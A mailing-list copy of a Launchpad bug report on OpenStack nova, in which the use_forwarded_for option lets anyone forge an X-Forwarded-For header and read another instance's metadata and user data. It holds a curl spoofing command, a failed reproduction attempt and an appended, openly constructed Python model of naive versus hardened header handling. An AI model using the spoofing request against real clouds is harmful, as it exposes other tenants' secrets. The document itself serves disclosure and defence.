[Openstack-security] [Bug 1563954] Re: use_forwarded_for exposes metadata

XiaojueGuan 1563954 at bugs.launchpad.net
Fri Dec 6 10:41:34 UTC 2019


This bug might already be fixed; I tried to reproduce it but failed with devstack.
[stack at devstack devstack]$ openstack server create --image centos7 --flavor ds1G --network f2a39df5-0938-4973-9810-a80d341229bf --user-data /tmp/data  test1 
+-------------------------------------+------------------------------------------------+
| Field                               | Value                                          |
+-------------------------------------+------------------------------------------------+
| OS-DCF:diskConfig                   | MANUAL                                         |
| OS-EXT-AZ:availability_zone         |                                                |
| OS-EXT-SRV-ATTR:host                | None                                           |
| OS-EXT-SRV-ATTR:hypervisor_hostname | None                                           |
| OS-EXT-SRV-ATTR:instance_name       |                                                |
| OS-EXT-STS:power_state              | NOSTATE                                        |
| OS-EXT-STS:task_state               | scheduling                                     |
| OS-EXT-STS:vm_state                 | building                                       |
| OS-SRV-USG:launched_at              | None                                           |
| OS-SRV-USG:terminated_at            | None                                           |
| accessIPv4                          |                                                |
| accessIPv6                          |                                                |
| addresses                           |                                                |
| adminPass                           | TuHp5eHEMMfW                                   |
| config_drive                        |                                                |
| created                             | 2019-12-06T10:32:10Z                           |
| flavor                              | ds1G (d2)                                      |
| hostId                              |                                                |
| id                                  | afdecb55-f3e1-4099-b947-1704112cb9ae           |
| image                               | centos7 (2f2396d2-b32e-4275-93b3-df9fb376dc36) |
| key_name                            | None                                           |
| name                                | test1                                          |
| progress                            | 0                                              |
| project_id                          | 9aafb875525b45b79be2d1ca5d27ffb0               |
| properties                          |                                                |
| security_groups                     | name='default'                                 |
| status                              | BUILD                                          |
| updated                             | 2019-12-06T10:32:10Z                           |
| user_id                             | d994888b0c764c8288cc1162f69b8d8b               |
| volumes_attached                    |                                                |
+-------------------------------------+------------------------------------------------+
[stack at devstack devstack]$ curl -H 'X-Forwarded-For: 192.168.199.151' http://localhost:8775/latest/user-data/
<html>
 <head>
  <title>400 Bad Request</title>
 </head>
 <body>
  <h1>400 Bad Request</h1>
  X-Instance-ID header is missing from request.<br /><br />


 </body>

-- 
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1563954

Title:
  use_forwarded_for exposes metadata

Status in OpenStack Compute (nova):
  Confirmed
Status in OpenStack Security Advisory:
  Opinion
Status in OpenStack Security Notes:
  Fix Released

Bug description:
  The nova metadata service uses the remote address to determine which
  metadata to retrieve. In order to work behind a proxy there is an
  option, use_forwarded_for, which will use the X-Forwarded-For header
  to determine the remote IP.

  If this option is set, then anyone who can access the metadata port
  can request metadata for any instance if they know the IP.

  The user data is also exposed.

  $ echo 123456 > /tmp/data
  $ openstack server create --image CentOS7 --flavor fedora --user-data /tmp/data test
  <wait>
  $ curl -H 'X-Forwarded-For: 10.0.0.7' http://localhost:8775/latest/user-data/
  123456

  At a minimum this side-effect isn't documented anywhere I could find.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1563954/+subscriptions
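The following is an added example, constructed for this page; it is neither nova's code nor anything posted by the reporter or by XiaojueGuan. It models the decision the bug description is about: which address a metadata handler uses to pick an instance when use_forwarded_for is off, when it is on and X-Forwarded-For is trusted unconditionally (the reported exposure), and when X-Forwarded-For is honoured only from a known proxy, taking the entry that proxy appended rather than whatever the client put first. It also models the other way an instance can be identified, a proxy-supplied X-Instance-ID that must carry an HMAC-SHA256 over a shared secret, which is the mechanism behind the 400 "X-Instance-ID header is missing" seen in the failed reproduction above: once requests arrive through the neutron metadata proxy, the handler takes the instance-id path and the spoofed client IP is never consulted. The table INSTANCES_BY_IP, the secret, the proxy address 192.0.2.50 and the function names are assumptions of this model, not nova identifiers.

```python
"""Constructed model of metadata requester identification (not nova code)."""
import hashlib
import hmac
import ipaddress

# Constructed stand-in for the "instance by fixed IP" lookup.
INSTANCES_BY_IP = {
    "10.0.0.7": {"id": "inst-a", "user_data": "123456"},
    "10.0.0.9": {"id": "inst-b", "user_data": "s3cr3t-bootstrap"},
}

# Constructed shared secret of the kind a metadata proxy and the service share.
SHARED_SECRET = b"constructed-shared-secret"


def client_ip(environ, use_forwarded_for, trusted_proxies=()):
    """Return the address used to select an instance.

    environ mimics a WSGI environ: REMOTE_ADDR is the TCP peer,
    HTTP_X_FORWARDED_FOR the header as the client or a proxy sent it.
    """
    peer = environ["REMOTE_ADDR"]
    xff = environ.get("HTTP_X_FORWARDED_FOR")
    if not use_forwarded_for or not xff:
        return peer
    if not trusted_proxies:
        # Bug 1563954 behaviour: a client-supplied header is believed as-is,
        # so anyone reaching the port can name any instance IP.
        return xff.split(",")[0].strip()
    # Hardened variant: only a known proxy may speak for another address, and
    # only the hop it appended (the rightmost entry) is authoritative; earlier
    # entries may have been written by the client itself.
    trusted = {ipaddress.ip_address(p) for p in trusted_proxies}
    if ipaddress.ip_address(peer) not in trusted:
        return peer
    return xff.split(",")[-1].strip()


def user_data_for(environ, use_forwarded_for, trusted_proxies=()):
    """Resolve the request to an instance and return its user data, or None."""
    inst = INSTANCES_BY_IP.get(client_ip(environ, use_forwarded_for, trusted_proxies))
    return inst["user_data"] if inst else None


def sign_instance_id(instance_id, secret=SHARED_SECRET):
    """HMAC-SHA256 hex digest a proxy would attach as X-Instance-ID-Signature."""
    return hmac.new(secret, instance_id.encode(), hashlib.sha256).hexdigest()


def instance_from_signed_headers(headers, secret=SHARED_SECRET):
    """Proxy-style path: X-Instance-ID is accepted only with a valid signature."""
    instance_id = headers.get("X-Instance-ID")
    if not instance_id:
        raise ValueError("X-Instance-ID header is missing from request.")
    expected = sign_instance_id(instance_id, secret)
    if not hmac.compare_digest(headers.get("X-Instance-ID-Signature", ""), expected):
        raise PermissionError("Invalid proxy request signature.")
    return instance_id


if __name__ == "__main__":
    # Constructed attacker request: an arbitrary host that can reach the port.
    attacker = {"REMOTE_ADDR": "198.51.100.23", "HTTP_X_FORWARDED_FOR": "10.0.0.7"}
    print("use_forwarded_for off   :", user_data_for(attacker, False))
    print("use_forwarded_for on    :", user_data_for(attacker, True))
    print("on, trusted proxy only  :", user_data_for(attacker, True, ("192.0.2.50",)))
    # Constructed request relayed by the trusted proxy on behalf of 10.0.0.9,
    # which itself tried to forge 10.0.0.7 in the header it sent.
    relayed = {"REMOTE_ADDR": "192.0.2.50", "HTTP_X_FORWARDED_FOR": "10.0.0.7, 10.0.0.9"}
    print("relayed, naive          :", user_data_for(relayed, True))
    print("relayed, trusted proxy  :", user_data_for(relayed, True, ("192.0.2.50",)))
    good = {"X-Instance-ID": "inst-a", "X-Instance-ID-Signature": sign_instance_id("inst-a")}
    print("signed instance id      :", instance_from_signed_headers(good))
```

With use_forwarded_for off the attacker's own address is looked up and finds nothing; with it on and no proxy allow-list, the forged header returns the user data of 10.0.0.7, which is the exposure the report shows with curl; with the proxy allow-list, a header from an unknown peer is ignored and a header relayed by the trusted proxy resolves to the address the proxy actually saw. The signed-instance-id path does not look at any IP at all, which is why a spoofed X-Forwarded-For sent straight to a deployment running in that mode gets the 400 rather than data.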



More information about the Openstack-security mailing list